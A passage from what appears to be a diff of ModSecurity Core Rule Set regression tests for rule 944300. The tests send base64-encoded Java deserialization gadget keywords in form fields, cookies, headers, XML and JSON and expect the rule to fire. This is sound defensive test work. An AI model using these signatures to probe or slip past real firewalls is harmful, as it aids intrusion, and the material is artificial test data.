"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type application/json arg 
value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" 
+ data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie name 
includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: 
"Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: 
+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
